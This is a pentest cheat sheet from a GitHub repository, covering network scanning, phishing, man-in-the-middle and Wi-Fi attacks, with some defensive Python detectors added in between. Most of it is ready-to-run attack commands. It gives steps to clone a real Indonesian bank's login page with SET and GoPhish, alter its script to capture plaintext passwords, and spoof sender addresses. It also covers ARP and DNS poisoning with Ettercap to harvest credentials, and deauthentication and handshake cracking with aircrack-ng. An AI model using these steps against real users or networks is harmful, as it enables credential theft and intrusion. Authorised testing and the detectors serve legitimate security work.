yogikortisa/pentest-cheatsheet

Information Gathering

Passive Reconnaissance

Open-Source Intelligence

  • Use Maltego to perform OSINT investigation and analysis: "People Interest".

Web Passive Testing

  • Use Burp Suite to poke around, understand the app's logic and functionality, observe all HTTP requests and responses, and map the attack surface.
  • Goal: understand all access points / attack surfaces and functionality of the system (HTTP headers, parameters, cookies, APIs, technology, usage patterns, etc.).

Active Reconnaissance

Infrastructure Enumeration / Host Discovery

  • Ping scan only (-sn): searches for live hosts and disables port scanning. Choose the target range that fits the engagement scope.
nmap 192.168.100.0/24 -sn 
nmap 192.168.100.* -sn 

Host Enumeration & Port Scanning

  • Scan Top 10 TCP Ports
nmap 192.168.100.31 --top-ports=10
  • Fast mode, only scan 100 most common ports
nmap -F -v 192.168.100.31 
  • Normal-scan, scan 1000 most common ports
nmap -v 192.168.100.31 
  • Scan all 65535 TCP ports
nmap -p- 192.168.100.31
  • Operating System (OS) detection. For speed and efficiency use -Pn to skip the ICMP/ping host discovery and -n to disable DNS resolution.
sudo nmap -O 192.168.100.31 -Pn -n

Service Enumeration / Discovery / Scanning:

  • Service version detection: enumerate all services and their versions. For speed and efficiency use -Pn to skip the ICMP/ping host discovery and -n to disable DNS resolution.
nmap -p- -v -sV -Pn -n 192.168.100.31
  • Banner grabbing: grab the banner of an open port.
nc -nv 192.168.100.31 21
nc -nv 192.168.100.31 80
nmap -sV --script=banner -p21 10.10.10.0/24
  • Remote Shell (RSH) service on Default Port 514
rsh -l root 192.168.100.31
  • Remote Login Service (rlogin) on Default Port 513
rlogin -l root 192.168.100.31

msf > search rlogin
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.100.31
msf auxiliary (scanner/rservices/rlogin_login) > set username root
msf auxiliary (scanner/rservices/rlogin_login) > exploit
  • HTTP service enumeration on an IP
nmap --script=http-enum 192.168.100.31 -p80,8081
  • FTP service enumeration
nmap -sC -sV -p21 192.168.100.31
ftp -p 192.168.100.31
  • SMB service enumeration
nmap --script smb-os-discovery.nse -p445 192.168.100.31
nmap -A -p445 192.168.100.31
  • List SMB Shares
smbclient -N -L \\\\192.168.100.31
  • Connect to an SMB share
smbclient \\\\192.168.100.31\\users
ls
	NT_STATUS_ACCESS_DENIED listing \*
exit
smbclient -U bob \\\\192.168.100.31\\users
  • SNMP service enumeration
snmpwalk -v 2c -c public 192.168.100.31 1.3.6.1.2.1.1.5.0
snmpwalk -v 2c -c private 192.168.100.31
  • Brute-force the SNMP community string
onesixtyone -c dict.txt 192.168.100.31
  • Default Nmap Scripting Engine (NSE) Scanning
# Default: -sC or --script=default
nmap -sC 192.168.100.31
# Scripts only run based on the port states the scan finds
nmap -sC -p445 192.168.100.31
# To run specific script or category
nmap --script=http-enum -p80 192.168.100.31
nmap --script=http-* -p80 192.168.100.31
nmap --script=banner -p22,23 192.168.100.31
# Aggressive scan: performs service detection, OS detection, traceroute and runs the default scripts against the target.
nmap -p 80 -A 192.168.100.31
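Added example (not from the repository): a small Python parser for nmap's XML report, which the commands above produce when run with `-oX <file>` (a real nmap option the page does not show). It pulls the live hosts and their open ports with detected versions into plain dicts, then flags legacy cleartext services such as the FTP, rlogin and rsh ports enumerated above, which is the list a defender wants closed and a tester wants in the report. The XML below is constructed to mirror nmap's output shape; the host, MAC, hostname and product versions are made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the shape of an nmap -oX report, trimmed to the parts used below.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- -sV -oX scan.xml 192.168.100.31">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.100.31" addrtype="ipv4"/>
    <address addr="08:00:27:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="target.lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="vsftpd" version="3.0.3" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="22"><state state="filtered" reason="no-response"/><service name="ssh" method="table" conf="3"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" version="2.4.57" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="513"><state state="open" reason="syn-ack"/><service name="login" method="table" conf="3"/></port>
      <port protocol="tcp" portid="514"><state state="open" reason="syn-ack"/><service name="shell" method="table" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.100.32" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# nmap service names that mean credentials or commands travel in cleartext (or unauthenticated)
LEGACY_CLEARTEXT = {
    "ftp": "cleartext credentials (FTP)",
    "telnet": "cleartext session (Telnet)",
    "login": "rlogin: trust-based cleartext login (port 513)",
    "shell": "rsh: trust-based cleartext remote shell (port 514)",
    "exec": "rexec: cleartext remote exec",
    "snmp": "SNMPv1/v2c: community string is the only secret",
}


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ip, mac, hostname and its open ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip hosts nmap reported as down
        ip = mac = None
        for addr in host.findall("address"):
            if addr.get("addrtype") == "ipv4":
                ip = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                mac = addr.get("addr")
        hn = host.find("hostnames/hostname")
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # only open ports matter for the service inventory
            svc = port.find("service")
            open_ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
        hosts.append({"ip": ip, "mac": mac,
                      "hostname": hn.get("name") if hn is not None else None,
                      "open_ports": open_ports})
    return hosts


def flag_legacy_services(hosts):
    """Return (ip, port, service, reason) for every open legacy cleartext service."""
    findings = []
    for h in hosts:
        for p in h["open_ports"]:
            reason = LEGACY_CLEARTEXT.get(p["service"])
            if reason:
                findings.append((h["ip"], p["port"], p["service"], reason))
    return findings


if __name__ == "__main__":
    hosts = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print(f"{h['ip']} ({h['hostname']}) open: {[p['port'] for p in h['open_ports']]}")
    for ip, port, svc, reason in flag_legacy_services(hosts):
        print(f"  FINDING {ip}:{port} {svc}: {reason}")
```

Feed it a real report with `parse_nmap_xml(open("scan.xml").read())`; the same structure extends to the `script` child elements NSE adds under each port if you want the vuln-category output collected too.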

Vulnerability Assessment

  • Nmap Scripting Engine (NSE) - Vuln Category
# NSE location
ls /usr/share/nmap/scripts
# Run all scripts in the vuln category to see which vulnerabilities can be found
nmap -p 80 -sV --script vuln 192.168.100.31
# Uses specific vuln script
nmap -p 21 -sV --script ftp-vsftpd-backdoor 192.168.100.31

The Exploitation

  • Attacking the User. The art of Human Hacking. Using SET and GoPhish.
# The Social-Engineering Toolkit (SET)
## Credential Harvester Attack
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 2) Website Attack Vectors
set> 3) Credential Harvester Attack Method

# Case 0: just use a default SET template, such as the Google web phishing page
set> 1) Web Templates
set> IP address listener: your-kali-ip
set> 2. Google

# Case 1: No config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: http://testphp.vulnweb.com/login.php

# Case 2: needs config: switch the web server to Apache so the phishing page files can be edited at the default path /var/www/html/
sudo sed -i 's/^APACHE_SERVER=OFF/APACHE_SERVER=ON/' /etc/setoolkit/set.config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: https://ibank.klikbca.com
  • Phishing email simulation (phishing assessment). Requirement: 2FA must already be enabled on the Google account in order to use Google's SMTP service to send the phishing emails.
# Step to Setup MFA on Google and gain SMTP password
- open Google, click the top-right corner
- click "Manage your Google Account > Security > 2-Step Verification > Add phone number / Authenticator"

# Step to get Google SMTP Service Password
- open: https://myaccount.google.com/apppasswords
- enter an app name, copy the password to use as the SMTP password.
# Phishing Assessment using SET: Mass Mailer Attack
# NOTE: LAST TIME I TRIED, THIS NO LONGER WORKED; IT SEEMS EVEN AN EMPTY FILE (NOT MALWARE) STILL GETS BLOCKED BY GOOGLE. SKIP FOR NOW.
touch /home/kali/update.exe
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 5) Mass Mailer Attack

set> 1.  E-Mail Attack Single Email Address
set> 1. Pre-Defined Template
set> 1. New Update
set> Send Email to: victim@email.com
set> 1. Use a gmail Account for your email attack.
set> Your gmail email address: your-gmail-smtp@gmail.com
set:phishing> The FROM NAME the user will see: Administrator
Email password: 
set:phishing> Flag this message/s as high priority? [yes|no]: no
Do you want to attach a file - [y/n]: y
The path of file: /home/kali/update.exe
Do you want to attach an inline file - [y/n]: n
[*] SET has finished sending the emails

# Phishing Assessment using GoPhish
## If using Kali Linux:
sudo sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" /etc/gophish/config.json
gophish
# open the web UI at https://your-kali-linux-ip:3333
https://192.168.56.16:3333/
# Default credentials:
# Username: admin
# Password: kali-gophish
# To stop it: gophish-stop

## If using other Linux distro:
mkdir gophish && cd gophish
wget --no-check-certificate -O gophish.zip https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
sudo apt install -y unzip
unzip gophish.zip && rm gophish.zip
sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" config.json
chmod +x gophish
./gophish
# Browse to https://localhost:3333
# See the logs for default credentials

# If GoPhish shows "Unable to connect" after starting, make sure port 80 is not already in use (open) by another service; check with nmap:
nmap -p80 -sV localhost
# If it is in use (open), find out which service is using it and stop it. For example, if Apache2 is using it:
service apache2 stop

- Sending Profiles
# Name: Gmail SMTP Server
# SMTP From: admin@klikbca.com
# Host: smtp.gmail.com:587
# Username: your-smtp-mail@gmail.com

- Landing Pages
# Import Site: https://ibank.klikbca.com
# Edit the script at the `var enkrip` part and remove the encryption so the password is captured in plain text:
var enkrip = document.getElementById("txt_pswd").value;
# Tick Capture Submitted Data & Capture Passwords
# Redirect to: https://ibank.klikbca.com

- Email Templates
# Create an email template (KlikBCA) using Grok AI, example prompt: "create gophish email templates for klikbca.com phising campaign"
# example: https://x.com/i/grok/share/9E14wo6WaBOuBOicnoiJjjFzR
# Name: KlikBCA Account Security Verification
# Envelope Sender: KlikBCA <admin@klikbca.com>
# Subject: Verifikasi Keamanan Akun KlikBCA Anda
# Edit the template and adjust the logo part:
<img src="https://www.klikbca.com/images/top_BCA1.jpg" alt="KlikBCA Logo" width="150">

# Example 2, via Import Email:
# pick one Google email with the subject "Notifikasi keamanan"
# right-click the email > "Tampilkan versi asli" (Show original) > Copy to clipboard
# Name: Import Email
# Click "Import Email" > paste the clipboard
# Envelope Sender: Google <your-smtp-gmail@gmail.com>
# Subject: Notifikasi keamanan

- Users & Groups
# Add New Group, enter the victims' emails and particular info.

- Campaigns 
# New Campaign
# Name: KlikBCA Campaign
# Attacker / Gophish Server URL (use HTTP not HTTPS!): http://192.168.88.132
# Sending Profile: Gmail SMTP Server 
  • Email spoofing simulation in a phishing assessment (GoPhish + MailHog)
mkdir mailhog && cd mailhog
wget https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64
chmod +x MailHog_linux_amd64
sudo ./MailHog_linux_amd64
# Mail Inbox: http://localhost:8025/
# The new SMTP port: 1025

# Change Config on GoPhish:
- Edit Sending Profile
# SMTP From: KlikBCA <halo@bca.co.id>
# Host: localhost:1025
# Username & Pass: leave empty
- Edit Email Template
# Envelope sender: KlikBCA <halo@bca.co.id>
- Launch New Campaign!

- [ ] (Bonus) Using ngrok to expose localhost to the internet
# Ngrok alternative
https://outray.dev/
# Signup & Download: ngrok.com
mkdir ngrok && cd ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
sudo tar -xvzf ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
ngrok config add-authtoken {{YOUR-AUTH-TOKEN}}
ngrok http http://localhost
# Change in GoPhish > New Campaign > URL: the one generated by ngrok, e.g.: https://158a-2001-448a-1001-64ec-9c37-ff83-d99e-ad3.ngrok-free.app
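Added example (not part of the repository, GoPhish or SET): seen from the receiving side, the campaigns set up above leave a recognisable trace in the mail headers, and this Python check reads a raw message and reports why its sender identity should not be trusted: the visible From domain not aligning with the envelope sender (Return-Path), a missing Authentication-Results header (what a catch-all relay such as MailHog produces, since nothing validates the sender), or a DMARC failure recorded by the receiving MX. The three messages are constructed on example.com/example.net; the alignment test is a deliberate simplification of DMARC's relaxed mode (it treats a subdomain as aligned and does not consult the public suffix list).

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed sample 1: relayed through a real mail provider; the visible From does not match
# the envelope sender, and the receiving MX recorded a DMARC failure.
MISALIGNED_MSG = """Return-Path: <bulk-sender@mailer.example.net>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=mailer.example.net; dkim=none; dmarc=fail header.from=example.com
From: IT Support <admin@example.com>
To: staff@example.com
Subject: Account Security Verification
Content-Type: text/plain

Please verify your account.
"""

# Constructed sample 2: sent via a local catch-all SMTP server (MailHog-style). The envelope sender is
# whatever the sending tool chose, so it aligns, but no receiver ever authenticated it.
UNAUTHENTICATED_MSG = """Return-Path: <hello@example.com>
From: Example Bank <hello@example.com>
To: staff@example.com
Subject: Verify your account
Content-Type: text/plain

Click here.
"""

# Constructed sample 3: a legitimate, fully authenticated message.
CLEAN_MSG = """Return-Path: <notify@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: Notifications <notify@example.com>
To: staff@example.com
Subject: Security alert
Content-Type: text/plain

New sign-in.
"""


def _domain(addr_header):
    """Lowercase domain from a header value such as 'Name <user@host>'; '' if none."""
    _, addr = parseaddr(str(addr_header or ""))
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def _relaxed_align(a, b):
    """Simplified relaxed alignment: equal, or one domain is a subdomain of the other.
    (Real DMARC compares organizational domains using the public suffix list.)"""
    return bool(a and b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def auth_results(msg):
    """Parse 'method=result' pairs out of Authentication-Results (assumes a single header)."""
    results = {}
    header = msg.get("Authentication-Results") or ""
    for part in header.split(";")[1:]:  # [0] is the authserv-id
        token = part.strip().split()[0] if part.strip() else ""
        if "=" in token:
            method, result = token.split("=", 1)
            results[method.lower()] = result.lower()
    return results


def spoof_indicators(raw):
    """Return the reasons a message's sender identity should not be trusted (empty = none found)."""
    msg = message_from_string(raw)
    from_dom = _domain(msg.get("From"))
    rp_dom = _domain(msg.get("Return-Path"))
    auth = auth_results(msg)
    reasons = []
    if not _relaxed_align(from_dom, rp_dom):
        reasons.append(f"From domain {from_dom!r} not aligned with envelope sender {rp_dom!r}")
    if not auth:
        reasons.append("no Authentication-Results header: SPF/DKIM/DMARC were never evaluated")
    else:
        if auth.get("dmarc") != "pass":
            reasons.append(f"DMARC result is {auth.get('dmarc', 'missing')!r}")
        if auth.get("spf") != "pass" and auth.get("dkim") != "pass":
            reasons.append("neither SPF nor DKIM passed")
    return reasons


if __name__ == "__main__":
    for name, raw in [("misaligned", MISALIGNED_MSG), ("unauthenticated", UNAUTHENTICATED_MSG), ("clean", CLEAN_MSG)]:
        print(name, "->", spoof_indicators(raw) or ["no indicators"])
```

A mail gateway applying these checks is the reason the page's Gmail-relayed attachment test stopped working and why the MailHog variant only works inside a lab: with a DMARC reject policy on the impersonated domain, a message whose From does not align with an authenticated sender is dropped before a user sees it.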
  • System Hacking using Metasploit

  • Web Hacking Using Burp Suite

Network & Wireless Hacking

  • Wireless Hacking: Setup Driver & Quick Win using Wifite
# Setup Wireless External Adapter

# Setting virtualbox
Setting -> USB -> USB 2.0

# Check the adapter
(On Virtualbox: Device -> USB -> Check Adapter)
lsusb
ip link
ip a
iwconfig

# update the repos first
sudo apt update
# If apt update error on signature verification (https://forums.kali.org/t/apt-update-gpg-missing-key-error/7563), do this: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
# Install the driver & reboot for TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] (v1 needs no driver install)
# Driver that enables monitor mode and packet injection
sudo apt install -y realtek-rtl8188eus-dkms
reboot

# Set the adapter into Monitor Mode
sudo ifconfig wlan0 down && sudo iw wlan0 set monitor control && sudo ifconfig wlan0 up && iwconfig

# Return to managed mode
sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up && iwconfig

# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## Check whether a traffic indicator appears for wlan0. If aireplay-ng captures/injects zero (0) packets, there is a problem with the Wi-Fi device: just uncheck and re-check the adapter (on VirtualBox: Devices -> USB -> uncheck & re-check the adapter)

# If the only problem is an interfering process, just check for and kill it:
sudo airmon-ng check && sudo airmon-ng check kill

# Wifite captures everyone who newly joins the Wi-Fi, and clients that re-join after being kicked off automatically (de-auth attacks) are captured automatically in its .pcap file.
sudo wifite --kill

# without PMKID
sudo wifite --kill --no-pmkid
  • Network Hacking: The Classic MITM (ARP & DNS Spoofing) using Ettercap & Wireshark
# MITM requirement: enable ip_forward so the intercepted packets seen in Wireshark are forwarded on
cat /proc/sys/net/ipv4/ip_forward
sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP Spoofing with Ettercap
open the Ettercap GUI
select the target interface > click Accept to start unified sniffing
click Scan for hosts
Add Target 1 (victim), add Target 2 (router/default gateway)
click MITM menu > ARP poisoning
Open Wireshark to check whether packets are being captured
# POST request credential harvesting in Wireshark
# test a login on an HTTP login page; if it errors after submitting, just submit again
# check in Wireshark with the filter:
http.request.method==POST

# DNS spoofing requirements:
Prepare a phishing website, e.g. a fake Google site with setoolkit
# Change the Ettercap configuration so it can spoof DNS, and fill in the IP where the fake Google site is running (attacker)
sudo mousepad /etc/ettercap/etter.conf
# Change the following two lines to 0
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
# Uncomment the redir_command_* lines (and the IPv6 ones) under:
#---------------
#     Linux 
#---------------
sudo mousepad /etc/ettercap/etter.dns
google.com A 192.168.100.1
*.google.com A 192.168.100.9

# Launch DNS Spoofing/Poisoning with Ettercap GUI
open the Ettercap GUI
select the target interface > click Accept to start unified sniffing
Stop unified sniffing
click Scan for hosts
Add Target 1 (router/default gateway), add Target 2 (victim)
click MITM menu > ARP poisoning
click Plugins > Manage plugins > check dns_spoof
Start unified sniffing
# If crash, just use Ettercap CLI alternative to perform dns spoofing:
sudo ettercap -T -q -i eth1 -M arp:remote /192.168.100.1// /192.168.100.9// -P dns_spoof
# Flush DNS on cmd:
ipconfig /flushdns
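Added example (not from the repository): the ARP poisoning step above makes one MAC address answer for both the gateway and the victim, and the gateway IP's MAC changes while the attack runs. This Python detector replays a constructed list of sniffed ARP replies and raises both signals, which is the logic behind tools such as arpwatch and the switch-side Dynamic ARP Inspection that defenders deploy against this exact technique. All addresses are constructed; the optional `trusted` mapping lets you pin the gateway's known MAC so the first spoofed reply is flagged even if the legitimate one was never observed.

```python
from collections import defaultdict

# Constructed ARP reply observations: (seconds, sender_ip, sender_mac), as a sniffer would record them.
# Gateway 192.168.100.1 normally answers from aa:..:01 and victim 192.168.100.9 from bb:..:09;
# at t=5 a third MAC (cc:..:cc) starts answering for both, which is what poisoning both targets looks like.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.100.1", "aa:aa:aa:aa:aa:01"),
    (0.5, "192.168.100.9", "bb:bb:bb:bb:bb:09"),
    (1.0, "192.168.100.31", "08:00:27:aa:bb:cc"),
    (5.0, "192.168.100.1", "cc:cc:cc:cc:cc:cc"),
    (5.1, "192.168.100.9", "cc:cc:cc:cc:cc:cc"),
    (6.0, "192.168.100.1", "cc:cc:cc:cc:cc:cc"),
]


def detect_arp_spoof(replies, trusted=None):
    """Return alerts as (timestamp_or_None, message).

    Two signals: an IP whose MAC changes between replies (flip), and a single MAC that
    claims more than one IP (the attacker impersonating gateway and victim at once).
    `trusted` pins known ip->mac bindings (e.g. the default gateway) ahead of any traffic.
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is None:
            ip_to_mac[ip] = mac          # first time we see this IP: learn the binding
        elif prev != mac:
            alerts.append((ts, f"{ip} moved from {prev} to {mac}"))
            ip_to_mac[ip] = mac          # track the new claim so repeats are not re-alerted

    claims = defaultdict(set)            # mac -> every IP it has answered for
    for _, ip, mac in replies:
        claims[mac.lower()].add(ip)
    for mac, ips in sorted(claims.items()):
        if len(ips) > 1:
            alerts.append((None, f"{mac} claims {len(ips)} addresses: {sorted(ips)}"))
    return alerts


if __name__ == "__main__":
    for ts, msg in detect_arp_spoof(SAMPLE_ARP_REPLIES):
        print(f"[{ts if ts is not None else 'summary'}] {msg}")
```

On a Linux host the current table these replies populate is visible with `ip neigh`, and a static entry for the gateway (or DAI on the access switch) is the mitigation this detector would otherwise only report on.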
  • Wireless Hacking: The Classic Wi-Fi Attacks using the Aircrack-ng suite
# Airmon-NG 101
# Start monitoring mode using airmon-ng
sudo airmon-ng start wlan0 && iwconfig

# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## Check whether a traffic indicator appears for wlan0. If aireplay-ng captures/injects zero (0) packets, there is a problem with the Wi-Fi device: just uncheck and re-check the adapter (on VirtualBox: Devices -> USB -> uncheck & re-check the adapter)

# If the only problem is an interfering process, just check for and kill it:
sudo airmon-ng check && sudo airmon-ng check kill

# Scan on-demand / live-capture all wireless access points with airodump-ng and note the channel of the target BSSID
sudo airodump-ng wlan0


# Scan wireless networks and save the output to files with the prefix "cyber", including the .pcap capture file to crack.
## -c = channel of the target Access Point / BSSID, to narrow down the traffic capture. -w = prefix name of the captured file (.pcap)
sudo airodump-ng wlan0 -c 6 -w cyber

# Use particular channel of BSSID target (in this example target using CH 6) and specific BSSID mac address to cut the noises and to get target's mac address faster
sudo airodump-ng wlan0 -c 6 --bssid DA:CF:DB:29:F7:7E -w cyber


## De-auth attack to force the victim to re-join and capture the EAPOL (4-way handshake), then crack it with aircrack-ng.
## --deauth 5 = the number of deauths to send, -a = Access Point / BSSID target, -c = MAC address of client that will be de-auth attacked
sudo aireplay-ng --deauth 5 -a DA:CF:DB:29:F7:7E -c E8:B1:FC:F3:AF:20 wlan0

# Crack the capture file from airodump-ng
aircrack-ng cyber-01.cap -w /usr/share/wordlists/wifite.txt
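Added example (not from the repository or the aircrack-ng suite): the deauthentication step above shows up in a monitor-mode capture as a burst of management frames of subtype 0x0c (Wireshark filter `wlan.fc.type_subtype == 0x0c`) from the AP's BSSID to one client. This Python detector runs a sliding window over a constructed frame list and alerts when the deauth/disassoc count for a (BSSID, client) pair crosses a threshold, while a single legitimate deauth passes. Protected Management Frames (802.11w) are the AP-side mitigation that stops forged frames like these from being honoured. All MACs, timings and the threshold are constructed.

```python
from collections import defaultdict, deque

# 802.11 management frame subtypes as shown in Wireshark's wlan.fc.type_subtype field
BEACON, DISASSOC, DEAUTH = 0x08, 0x0a, 0x0c

AP = "02:11:22:33:44:55"        # constructed BSSID
CLIENT = "02:aa:bb:cc:dd:ee"    # constructed client station
OTHER_AP = "02:66:77:88:99:00"  # constructed second BSSID

# Constructed capture: (seconds, subtype, bssid, destination)
SAMPLE_FRAMES = (
    [(i * 0.1, BEACON, AP, "ff:ff:ff:ff:ff:ff") for i in range(5)]      # ordinary beacons
    + [(0.5, DEAUTH, AP, CLIENT)]                                        # one deauth: normal roaming noise
    + [(10.00 + i / 100, DEAUTH, AP, CLIENT) for i in range(8)]          # 8 deauths in 70 ms: a flood
    + [(30.0, DEAUTH, AP, CLIENT)]                                       # isolated again afterwards
    + [(31.0 + i / 100, DISASSOC, OTHER_AP, CLIENT) for i in range(3)]   # short burst, below threshold
)


def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """Return (ts, bssid, dst, count), once per burst, when deauth/disassoc frames for a
    (bssid, dst) pair reach `threshold` inside a sliding window of `window_s` seconds."""
    recent = defaultdict(deque)   # (bssid, dst) -> timestamps still inside the window
    active = set()                # pairs currently inside an alerted burst
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue              # beacons, probes, data frames are irrelevant here
        key = (bssid.lower(), dst.lower())
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()           # expire timestamps that fell out of the window
        if len(q) >= threshold:
            if key not in active:
                active.add(key)   # alert once when the threshold is first crossed
                alerts.append((ts, key[0], key[1], len(q)))
        else:
            active.discard(key)   # burst is over; a new one may alert again
    return alerts


if __name__ == "__main__":
    for ts, bssid, dst, n in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"t={ts:.2f}s deauth flood: {n} frames from {bssid} to {dst} within 1s")
```

To run this over a real capture, read the frames with a pcap library and map each frame's FC type/subtype and address fields onto the tuple shape used above; wireless IDS products apply the same per-pair rate logic.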

Post-Exploitation

  • Privilege Escalation

Post-Engagement

  • Reporting and Mitigation

About

My Practical Pentest Cheat Sheets.
